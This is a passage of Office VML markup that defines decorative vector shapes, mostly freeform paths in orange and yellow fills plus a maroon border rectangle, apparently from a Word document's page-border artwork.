                  <v:shape id="Freeform 95" o:spid="_x0000_s1119"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96" o:spid="_x0000_s1120"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97" o:spid="_x0000_s1121"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" path="m31,39l,,21,17,31,39xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,39;0,0;21,17;31,39" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 98" o:spid="_x0000_s1122"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" path="m16,13l5,9,,,16,13xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,13;5,9;0,0;16,13" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 99" o:spid="_x0000_s1123"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" path="m31,8l41,125r-5,5l31,134,15,130r-5,l,125,,65,,4,10,,20,,31,4r,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,8;41,125;36,130;31,134;15,130;10,130;0,125;0,65;0,4;10,0;20,0;31,4;31,8" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 100" o:spid="_x0000_s1124"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101" o:spid="_x0000_s1125"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" path="m11,13l,,11,13xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,13" o:connectangles="0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 102" o:spid="_x0000_s1126"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" path="m10,17l5,13,,,10,17xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,17;5,13;0,0;10,17" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 103" o:spid="_x0000_s1127"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" path="m,13l,9,,,,13xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,13;0,9;0,0;0,13" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 104" o:spid="_x0000_s1128"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" path="m16,4r,87l6,74,,48,,4,11,r5,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,4;16,91;6,74;0,48;0,4;11,0;16,4" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 105" o:spid="_x0000_s1129"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" path="m11,83l6,87,,83,,5,6,r5,5l11,83xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,83;6,87;0,83;0,5;6,0;11,5;11,83" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 106" o:spid="_x0000_s1130"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" path="m103,4l20,43,36,60r15,9l87,82r16,l77,78,51,69,25,60,,43,25,30,46,17,98,r5,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="103,4;20,43;36,60;51,69;87,82;103,82;77,78;51,69;25,60;0,43;25,30;46,17;98,0;103,4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 107" o:spid="_x0000_s1131"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" path="m6,17l,8,,,6,8r,9xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6,17;0,8;0,0;6,8;6,17" o:connectangles="0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 108" o:spid="_x0000_s1132"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109" o:spid="_x0000_s1133"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" path="m11,13l,,11,9r,4xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,9;11,13" o:connectangles="0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 110" o:spid="_x0000_s1134"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" path="m57,52r-21,l21,43,10,35,,26,,22,10,13,26,4,57,r,52xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,52;36,52;21,43;10,35;0,26;0,22;10,13;26,4;57,0;57,52" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 111" o:spid="_x0000_s1135"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" path="m83,13r10,5l104,22r10,l124,26r-20,5l88,39,73,48,36,39,,22,16,18,36,9,73,,83,13xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="83,13;93,18;104,22;114,22;124,26;104,31;88,39;73,48;36,39;0,22;16,18;36,9;73,0;83,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 112" o:spid="_x0000_s1136"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113" o:spid="_x0000_s1137"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114" o:spid="_x0000_s1138"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" path="m25,l10,4,,4,5,r5,l25,xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,0;10,4;0,4;5,0;10,0;25,0" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 115" o:spid="_x0000_s1139"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116" o:spid="_x0000_s1140"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" path="m11,34l6,64,16,86r5,26l37,138r-6,4l11,112,,82,,47,6,12,16,r,8l16,17,11,34xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,34;6,64;16,86;21,112;37,138;31,142;11,112;0,82;0,47;6,12;16,0;16,8;16,17;11,34" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 117" o:spid="_x0000_s1141"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118" o:spid="_x0000_s1142"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" path="m25,8r-5,9l10,25,,21,,17,,8,10,,20,4r5,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,8;20,17;10,25;0,21;0,17;0,8;10,0;20,4;25,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 119" o:spid="_x0000_s1143"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120" o:spid="_x0000_s1144"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" path="m31,26r-5,l20,21,,8,,,31,26xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,26;26,26;20,21;0,8;0,0;31,26" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 121" o:spid="_x0000_s1145"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" path="m73,65r-16,l47,60,26,52,11,26,,,26,17r26,9l62,34r11,5l78,52,73,65xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="73,65;57,65;47,60;26,52;11,26;0,0;26,17;52,26;62,34;73,39;78,52;73,65" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 122" o:spid="_x0000_s1146"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123" o:spid="_x0000_s1147"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124" o:spid="_x0000_s1148"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" path="m36,18r,4l31,26,15,22,,9,,,21,9r15,9xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,18;36,22;31,26;15,22;0,9;0,9;0,0;21,9;36,18" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 125" o:spid="_x0000_s1149"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126" o:spid="_x0000_s1150"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" path="m31,13l26,26r-5,l16,26,5,22,,17,,9,11,,26,4r5,9xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;21,26;16,26;5,22;0,17;0,9;11,0;26,4;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 127" o:spid="_x0000_s1151"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" path="m36,13r-5,9l21,22r-10,l,13,21,,31,5r5,8xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,22;11,22;0,13;21,0;31,5;36,13" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 128" o:spid="_x0000_s1152"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" path="m46,13l31,22,20,26r-5,l5,18,,9,15,r5,l36,5r10,8xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="46,13;31,22;20,26;15,26;5,18;0,9;15,0;20,0;36,5;46,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 129" o:spid="_x0000_s1153"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" path="m21,4l16,8r,5l6,8,,4,6,,16,r5,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,4;16,8;16,13;6,8;0,4;6,0;16,0;21,4" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 130" o:spid="_x0000_s1154"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" path="m26,4l20,9,5,9,,,15,,26,4xe" fillcolor="#ffde00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,4;20,9;5,9;0,0;15,0;26,4" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 131" o:spid="_x0000_s1155"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" path="m31,9l15,18,5,18,,18,15,,26,r5,l31,9xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,9;15,18;5,18;0,18;15,0;26,0;31,0;31,9" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 132" o:spid="_x0000_s1156"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133" o:spid="_x0000_s1157"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134" o:spid="_x0000_s1158"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" path="m10,9r5,1268l15,1316r-5,18l,1351r,-78l,4,10,r,4l10,9xe" fillcolor="#ff7f00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,9;15,1277;15,1316;10,1334;0,1351;0,1273;0,4;10,0;10,4;10,9" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 135" o:spid="_x0000_s1159"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136" o:spid="_x0000_s1160"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137" o:spid="_x0000_s1161"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" path="m135,13r,9l129,31,109,48,62,83,21,113,11,109,,104,21,78,52,52,109,5,119,r5,l135,13xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="135,13;135,22;129,31;109,48;62,83;21,113;11,109;0,104;21,78;52,52;109,5;119,0;124,0;135,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 138" o:spid="_x0000_s1162"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139" o:spid="_x0000_s1163"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" path="m57,4l6,48,,48,26,22,42,9,57,r,4xe" fillcolor="#ff7f00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,4;6,48;0,48;26,22;42,9;57,0;57,4" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 140" o:spid="_x0000_s1164"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141" o:spid="_x0000_s1165"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" path="m26,39r-16,l,26,,,26,18r5,8l31,35r-5,4xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,39;10,39;0,26;0,0;26,18;31,26;31,35;26,39" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 142" o:spid="_x0000_s1166"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143" o:spid="_x0000_s1167"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144" o:spid="_x0000_s1168"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" path="m5,r,l,4,,,5,xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5,0;5,0;0,4;0,4;0,0;5,0" o:connectangles="0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 145" o:spid="_x0000_s1169"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" path="m94,13l62,17,21,51,11,47,,38,11,21,21,4,42,,52,,83,,94,13xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="94,13;62,17;21,51;11,47;0,38;11,21;21,4;42,0;52,0;83,0;94,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 146" o:spid="_x0000_s1170"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" path="m16,34r-6,l,30,,21,5,8,16,r,34xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,34;10,34;0,30;0,21;5,8;16,0;16,34" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 147" o:spid="_x0000_s1171"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148" o:spid="_x0000_s1172"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" path="m,l,4,,xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;0,4;0,0" o:connectangles="0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 149" o:spid="_x0000_s1173"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150" o:spid="_x0000_s1174"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" path="m26,8r,9l21,17,,17,,8,5,,15,,26,8xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,17;21,17;0,17;0,8;5,0;15,0;26,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 151" o:spid="_x0000_s1175"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152" o:spid="_x0000_s1176"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153" o:spid="_x0000_s1177"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" path="m37,17r,13l26,30r-5,l16,30,,,16,8r21,9xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,17;37,30;26,30;21,30;16,30;0,0;16,8;37,17" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 154" o:spid="_x0000_s1178"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155" o:spid="_x0000_s1179"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" path="m68,21r5,18l83,60r-15,l52,56,31,43,,,31,13r37,8xe" fillcolor="#ff9e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="68,21;73,39;83,60;68,60;52,56;31,43;0,0;0,0;31,13;68,21" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 156" o:spid="_x0000_s1180"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" path="m47,22l36,26r-15,l,4,16,,31,,47,22xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="47,22;36,26;21,26;0,4;16,0;31,0;47,22" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 157" o:spid="_x0000_s1181"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" path="m26,8r,13l11,26r-5,l,17,6,8,11,,21,4r5,4xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,21;11,26;6,26;0,17;6,8;11,0;21,4;26,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 158" o:spid="_x0000_s1182"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" path="m109,48l93,44,78,39,52,22,36,39,26,48,10,52,,52,15,35,26,18,41,,52,,67,,93,22r16,26xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="109,48;93,44;78,39;52,22;36,39;26,48;10,52;0,52;15,35;26,18;41,0;52,0;67,0;93,22;109,48" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 159" o:spid="_x0000_s1183"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" path="m31,13l26,26,16,35,5,26,,17,,13,5,4,16,,26,4r5,5l31,13xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;16,35;5,26;0,17;0,13;5,4;16,0;26,4;31,9;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 160" o:spid="_x0000_s1184"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" path="m20,l15,21r-5,5l,26,,21,,13,10,,20,xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,0;15,21;10,26;0,26;0,21;0,13;10,0;20,0" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 161" o:spid="_x0000_s1185"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" path="m26,26l16,22,11,17,,,6,,21,13r5,9l26,26xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,26;16,22;11,17;0,0;6,0;21,13;26,22;26,26" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 162" o:spid="_x0000_s1186"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" path="m20,8r-5,9l5,21,,13,,4,5,,15,4r5,4xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,8;15,17;5,21;0,13;0,4;5,0;15,4;20,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 163" o:spid="_x0000_s1187"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" path="m20,9r-5,4l10,17,,13,5,,15,r5,9xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,9;15,13;10,17;0,13;5,0;15,0;20,9" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 164" o:spid="_x0000_s1188"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165" o:spid="_x0000_s1189"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" path="m62,31r5,17l67,65,52,70,41,78r,5l41,96r-10,4l26,100r,-9l26,78,,65,15,31,31,,41,5r11,8l62,31xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="62,31;67,48;67,65;52,70;41,78;41,83;41,96;31,100;26,100;26,91;26,78;0,65;15,31;31,0;41,5;52,13;62,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 166" o:spid="_x0000_s1190"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" path="m37,13r,13l26,34,11,30,,21,,13,,8,16,,31,4r6,9xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,13;37,26;26,34;11,30;0,21;0,13;0,8;16,0;31,4;37,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 167" o:spid="_x0000_s1191"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" path="m26,9r-6,8l15,22,5,22,,13,,4,5,,20,r6,9xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,9;20,17;15,22;5,22;0,13;0,4;5,0;20,0;26,9" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 168" o:spid="_x0000_s1192"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169" o:spid="_x0000_s1193"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170" o:spid="_x0000_s1194"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" path="m57,43l,43,5,34,10,21,26,r5,l36,4,57,21r,13l57,43xe" fillcolor="#ff5e00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,43;0,43;5,34;10,21;26,0;31,0;31,0;36,4;57,21;57,34;57,43" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 171" o:spid="_x0000_s1195"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" path="m98,4r,l47,8,26,8,,4,,,52,,73,,98,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="98,4;98,4;47,8;26,8;0,4;0,0;52,0;73,0;98,4" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 172" o:spid="_x0000_s1196"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" path="m161,13r-6,8l145,30,11,30,,21,,8,11,,140,r10,l161,13xe" fillcolor="#ffbf00" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="161,13;155,21;145,30;11,30;0,21;0,8;11,0;140,0;150,0;161,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 173" o:spid="_x0000_s1197"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" path="m99,8l47,8,,8,,4,47,,99,4r,4xe" fillcolor="#ff4000" stroked="f">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="99,8;47,8;0,8;0,4;47,0;99,4;99,8" o:connectangles="0,0,0,0,0,0,0"/>
                  </v:shape>
                  <v:shape id="Freeform 174" o:spid="_x0000_s1198"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" path="m42,l57,35,68,48r,4l62,52,31,39,,30,,26,11,22,21,9,26,r5,l42,xe" fillcolor="black" strokeweight=".25pt">
                    <v:path arrowok="t" o:connecttype="custom" o:connectlocs="42,0;57,35;68,48;68,52;62,52;31,39;0,30;0,26;11,22;21,9;26,0;31,0;42,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                  </v:shape>
                </v:group>
                <v:group id="Group 175" o:spid="_x0000_s1199" style="position:absolute;left:1942;top:1031;width:9163;height:14940" coordorigin="1942,1031" coordsize="9163,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176" o:spid="_x0000_s1200" style="position:absolute;left:1942;top:1031;width:9163;height:1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" filled="f" strokecolor="maroon" strokeweight="5.5pt">
                    <v:stroke linestyle="thinThick"/>
                  </v:rect>
                  <v:group id="Group 177" o:spid="_x0000_s1201" style="position:absolute;left:2061;top:14285;width:1571;height:1764;rotation:-9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">
                    <v:rect id="AutoShape 178" o:spid="_x0000_s1202"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1oxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gpeim4UKy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ABc21oxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                      <o:lock v:ext="edit" aspectratio="t"/>
                    </v:rect>
                    <v:shape id="Freeform 179" o:spid="_x0000_s1203"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" path="m165,31r-10,8l140,31,108,22,72,18r-31,l10,22,,22,21,9,46,5,67,,93,5r36,13l165,31xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="165,31;155,39;155,39;140,31;108,22;72,18;41,18;10,22;0,22;21,9;46,5;67,0;93,5;129,18;165,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 180" o:spid="_x0000_s1204"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181" o:spid="_x0000_s1205"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182" o:spid="_x0000_s1206"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" path="m36,13r-5,9l21,26,11,22,,13,5,5,16,,26,5r10,8xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,26;11,22;0,13;5,5;16,0;26,5;36,13" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 183" o:spid="_x0000_s1207"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184" o:spid="_x0000_s1208"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185" o:spid="_x0000_s1209"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" path="m31,39l,,21,17,31,39xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,39;0,0;21,17;31,39" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 186" o:spid="_x0000_s1210"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" path="m16,13l5,9,,,16,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,13;5,9;0,0;16,13" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 187" o:spid="_x0000_s1211"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" path="m31,8l41,125r-5,5l31,134,15,130r-5,l,125,,65,,4,10,,20,,31,4r,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,8;41,125;36,130;31,134;15,130;10,130;0,125;0,65;0,4;10,0;20,0;31,4;31,8" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 188" o:spid="_x0000_s1212"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189" o:spid="_x0000_s1213"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" path="m11,13l,,11,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,13" o:connectangles="0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 190" o:spid="_x0000_s1214"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" path="m10,17l5,13,,,10,17xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,17;5,13;0,0;10,17" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 191" o:spid="_x0000_s1215"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" path="m,13l,9,,,,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,13;0,9;0,0;0,13" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 192" o:spid="_x0000_s1216"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" path="m16,4r,87l6,74,,48,,4,11,r5,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,4;16,91;6,74;0,48;0,4;11,0;16,4" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 193" o:spid="_x0000_s1217"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" path="m11,83l6,87,,83,,5,6,r5,5l11,83xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,83;6,87;0,83;0,5;6,0;11,5;11,83" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 194" o:spid="_x0000_s1218"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" path="m103,4l20,43,36,60r15,9l87,82r16,l77,78,51,69,25,60,,43,25,30,46,17,98,r5,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="103,4;20,43;36,60;51,69;87,82;103,82;77,78;51,69;25,60;0,43;25,30;46,17;98,0;103,4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 195" o:spid="_x0000_s1219"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" path="m6,17l,8,,,6,8r,9xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6,17;0,8;0,0;6,8;6,17" o:connectangles="0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 196" o:spid="_x0000_s1220"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197" o:spid="_x0000_s1221"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" path="m11,13l,,11,9r,4xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,9;11,13" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 198" o:spid="_x0000_s1222"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" path="m57,52r-21,l21,43,10,35,,26,,22,10,13,26,4,57,r,52xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,52;36,52;21,43;10,35;0,26;0,22;10,13;26,4;57,0;57,52" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 199" o:spid="_x0000_s1223"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" path="m83,13r10,5l104,22r10,l124,26r-20,5l88,39,73,48,36,39,,22,16,18,36,9,73,,83,13xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="83,13;93,18;104,22;114,22;124,26;104,31;88,39;73,48;36,39;0,22;16,18;36,9;73,0;83,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 200" o:spid="_x0000_s1224"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201" o:spid="_x0000_s1225"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202" o:spid="_x0000_s1226"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" path="m25,l10,4,,4,5,r5,l25,xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,0;10,4;0,4;5,0;10,0;25,0" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 203" o:spid="_x0000_s1227"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204" o:spid="_x0000_s1228"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" path="m11,34l6,64,16,86r5,26l37,138r-6,4l11,112,,82,,47,6,12,16,r,8l16,17,11,34xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,34;6,64;16,86;21,112;37,138;31,142;11,112;0,82;0,47;6,12;16,0;16,8;16,17;11,34" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 205" o:spid="_x0000_s1229"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206" o:spid="_x0000_s1230"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" path="m25,8r-5,9l10,25,,21,,17,,8,10,,20,4r5,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="25,8;20,17;10,25;0,21;0,17;0,8;10,0;20,4;25,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 207" o:spid="_x0000_s1231"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208" o:spid="_x0000_s1232"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" path="m31,26r-5,l20,21,,8,,,31,26xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,26;26,26;20,21;0,8;0,0;31,26" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 209" o:spid="_x0000_s1233"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" path="m73,65r-16,l47,60,26,52,11,26,,,26,17r26,9l62,34r11,5l78,52,73,65xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="73,65;57,65;47,60;26,52;11,26;0,0;26,17;52,26;62,34;73,39;78,52;73,65" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 210" o:spid="_x0000_s1234"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211" o:spid="_x0000_s1235"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212" o:spid="_x0000_s1236"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" path="m36,18r,4l31,26,15,22,,9,,,21,9r15,9xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,18;36,22;31,26;15,22;0,9;0,9;0,0;21,9;36,18" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
